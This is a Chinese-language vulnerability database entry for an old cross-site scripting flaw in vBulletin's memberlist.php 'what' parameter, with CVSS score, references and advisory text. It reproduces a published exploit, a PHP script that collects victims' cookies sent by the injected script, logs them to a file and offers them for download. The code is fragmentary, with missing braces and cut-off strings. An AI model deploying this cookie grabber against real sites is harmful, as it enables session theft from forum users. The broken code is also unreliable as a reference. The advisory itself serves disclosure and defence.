发布时间 :2004-12-31 00:00:00
修订时间 :2017-07-10 21:31:22

[原文]Cross-site scripting (XSS) vulnerability in Jelsoft vBulletin before 3.0 allows remote attackers to inject arbitrary web script or HTML via the what parameter to memberlist.php.

[CNNVD]JelSoft VBulletin MemberList.PHP跨站脚本攻击(XSS)漏洞(CNNVD-200412-813)

        Jelsoft vBulletin 3.0之前的版本存在跨站脚本攻击(XSS)漏洞。远程攻击者可以借助到memberlist.php的what参数注入任意web脚本或HTML。

- CVSS (基础分值)

CVSS分值: 4.3 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)


- OVAL (用于检测的技术细节)


- 官方数据库链接
(官方数据源) MITRE
(官方数据源) NVD
(官方数据源) CNNVD

- 其它链接及资源
(UNKNOWN)  BUGTRAQ  20021121 XSS bug in vBulletin
(UNKNOWN)  BUGTRAQ  20040316 JelSoft vBulletin Multiple XSS Vulnerabilities
(UNKNOWN)  XF  vbulletin-memberlist-xss(10679)
(UNKNOWN)  BID  6226
(UNKNOWN)  BID  9887
(UNKNOWN)  XF  vbulletin-showthread-xss(15495)

- 漏洞信息

JelSoft VBulletin MemberList.PHP跨站脚本攻击(XSS)漏洞
中危 跨站脚本
2004-12-31 00:00:00 2005-10-20 00:00:00
        Jelsoft vBulletin 3.0之前的版本存在跨站脚本攻击(XSS)漏洞。远程攻击者可以借助到memberlist.php的what参数注入任意web脚本或HTML。

- 公告与补丁

        Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: .

- 漏洞信息 (22030)

VBulletin 2.0/2.2.x Memberlist.PHP Cross Site Scripting Vulnerability (EDBID:22030)
php webapps
2002-11-22 Verified
0 Sp.IC
N/A [点击下载]

vBulletin does not filter HTML tags from URI parameters, making it prone to cross-site scripting attacks.

As a result, it is possible for a remote attacker to create a malicious link containing script code which will be executed in the browser of a legitimate user, in the context of the website running vBulletin.

This issue may be exploited to steal cookie-based authentication credentials from legitimate users of the website running the vulnerable software.

      // vBulletin XSS Injection Vulnerability: Exploit
      // ---
      // Coded By : Sp.IC (SpeedICNet@Hotmail.Com).
      // Descrption: Fetching vBulletin's cookies and storing it into a
log file.

      // Variables:

      $LogFile = "Cookies.Log";

      // Functions:
      If ($HTTP_GET_VARS['Action'] = "Log") {
          $Header = "<!--";
          $Footer = "--->";
      Else {

           $Header = "";
           $Footer = "";
      Print ($Header);
      Print ("<Title>vBulletin XSS Injection Vulnerability:
      Print ("<Pre>");
      Print ("<Center>");
      Print ("<B>vBulletin XSS Injection Vulnerability: Exploit</B>\n");
      Print ("Coded By: <B><A
Href=\"MailTo:SpeedICNet@Hotmail.Com\">Sp.IC</A></B><Hr Width=\"20%\">");
      Print ($Footer);

      Switch ($HTTP_GET_VARS['Action']) {
          Case "Log":

                 $Data = $HTTP_GET_VARS['Cookie'];
                 $Data = StrStr ($Data, SubStr ($Data, BCAdd (0x0D, StrLen
(DecHex (MD5 (NULL))))));
                 $Log = FOpen ($LogFile, "a+");
                         FWrite ($Log, Trim ($Data) . "\n");
                         FClose ($Log);
                         Print ("<Meta HTTP-Equiv=\"Refresh\" Content=\"0;
                Case "List":
                 If (!File_Exists ($LogFile) || !In_Array ($Records)) {
                     Print ("<Br><Br><B>There are No
                     Exit ();
                 Else {
                     Print ("</Center></Pre>");
                     $Records = Array_UniQue (File ($LogFile));
                                  Print ("<Pre>");
                                  Print ("<B>.:: Statics</B>\n");
                     Print ("\n");
                                  Print ("o Logged Records : <B>" . Count
(File ($LogFile)) . "</B>\n");
                     Print ("o Listed Records : <B>" . Count
($Records) . " </B>[Not Counting Duplicates]\n");
                     Print ("\n");

                     Print ("<B>.:: Options</B>\n");
                     Print ("\n");

                     If (Count (File ($LogFile)) > 0) {
                         $Link['Download'] = "[<A Href=\"" .
$LogFile . "\">Download</A>]";
                         $Link['Download'] = "[No Records in Log]";

                     Print ("o Download Log : " . $Link
['Download'] . "\n");
                     Print ("o Clear Records : [<A Href=\"" .
$SCRIPT_PATH. "?Action=Delete\">Y</A>]\n");
                     Print ("\n");
                     Print ("<B>.:: Records</B>\n");
                     Print ("\n");

                     While (List ($Line[0], $Line[1]) = Each ($Records)) {
                         Print ("<B>" . $Line[0] . ": </B>" . $Line[1]);

                 Print ("</Pre>");
          Case "Delete":
              @UnLink ($LogFile);
              Print ("<Br><Br><B>Deleted Succsesfuly</B></Center></Pre>")
Or Die ("<Br><Br><B>Error: Cannot Delete Log</B></Center></Pre>");
              Print ("<Meta HTTP-Equiv=\"Refresh\" Content=\"3; URL=" .

- 漏洞信息

vBulletin memberlist.php what Parameter XSS
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

vBulletin contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate the "what" variable upon submission to the "memberlist.php" script. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

- 时间线

2004-03-15 Unknow
2004-03-15 Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者